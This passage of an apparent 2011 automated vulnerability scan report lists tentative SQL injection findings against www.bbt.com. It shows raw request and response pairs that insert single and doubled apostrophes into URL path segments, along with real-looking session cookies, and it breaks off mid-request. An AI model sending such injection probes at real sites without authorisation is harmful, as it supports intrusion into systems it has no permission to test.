p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/default.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:21 GMT
location: http://www.bbt.com/bbt/default.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 140
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/default.html%27%27">here</a>.</body>

1.54. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/chat/mtagconfig.js

Issue detail

Request 1

GET /bbt'/includes/chat/mtagconfig.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 13:45:59 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/includes/chat/mtagconfig.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 13:46:00 GMT
location: http://www.bbt.com/bbt/%27%27/includes/chat/mtagconfig.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 156
cache-control: private
x-powered-by: ASP.NET
Content-Length: 160

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/includes/chat/mtagconfig.js">here</a>.</body>

1.55. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/chat/mtagconfig.js

Issue detail

Request 1

GET /bbt/includes'/chat/mtagconfig.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 13:46:04 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes''/chat/mtagconfig.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 13:46:04 GMT
location: http://www.bbt.com/bbt/includes%27%27/chat/mtagconfig.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 155
cache-control: private
x-powered-by: ASP.NET
Content-Length: 159

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes%27%27/chat/mtagconfig.js">here</a>.</body>

1.56. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/chat/mtagconfig.js

Issue detail

Request 1

GET /bbt/includes/chat'/mtagconfig.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 13:46:09 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes/chat''/mtagconfig.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 13:46:11 GMT
location: http://www.bbt.com/bbt/includes/chat%27%27/mtagconfig.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 155
cache-control: private
x-powered-by: ASP.NET
Content-Length: 159

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/chat%27%27/mtagconfig.js">here</a>.</body>

1.57. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/chat/mtagconfig.js

Issue detail

Request 1

GET /bbt/includes/chat/mtagconfig.js' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 13:46:18 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes/chat/mtagconfig.js'' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 13:46:18 GMT
location: http://www.bbt.com/bbt/includes/chat/mtagconfig.js%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 155
cache-control: private
x-powered-by: ASP.NET
Content-Length: 159

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/chat/mtagconfig.js%27%27">here</a>.</body>

1.58. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/AC_RunActiveContent.js

Issue detail

Request 1

GET /bbt'/includes/javascript/AC_RunActiveContent.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:11:45 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/includes/javascript/AC_RunActiveContent.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:11:45 GMT
location: http://www.bbt.com/bbt/%27%27/includes/javascript/AC_RunActiveContent.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 171
cache-control: private
x-powered-by: ASP.NET
Content-Length: 175

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/includes/javascript/AC_RunActiveContent.js">here</a>.</body>

1.59. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/AC_RunActiveContent.js

Issue detail

Request 1

GET /bbt/includes'/javascript/AC_RunActiveContent.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:11:59 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes''/javascript/AC_RunActiveContent.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:11:59 GMT
location: http://www.bbt.com/bbt/includes%27%27/javascript/AC_RunActiveContent.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 170
cache-control: private
x-powered-by: ASP.NET
Content-Length: 174

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes%27%27/javascript/AC_RunActiveContent.js">here</a>.</body>

1.60. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/AC_RunActiveContent.js

Issue detail

Request 1

GET /bbt/includes/javascript'/AC_RunActiveContent.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:12:19 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes/javascript''/AC_RunActiveContent.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:12:20 GMT
location: http://www.bbt.com/bbt/includes/javascript%27%27/AC_RunActiveContent.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 170
cache-control: private
x-powered-by: ASP.NET
Content-Length: 174

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript%27%27/AC_RunActiveContent.js">here</a>.</body>

1.61. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/AC_RunActiveContent.js

Issue detail

Request 1

GET /bbt/includes/javascript/AC_RunActiveContent.js' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:12:40 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes/javascript/AC_RunActiveContent.js'' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:12:40 GMT
location: http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 170
cache-control: private
x-powered-by: ASP.NET
Content-Length: 174

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript/AC_RunActiveContent.js%27%27">here</a>.</body>

1.62. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/browserDetect.js

Issue detail

Request 1

GET /bbt'/includes/javascript/browserDetect.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

Request 2

GET /bbt''/includes/javascript/browserDetect.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
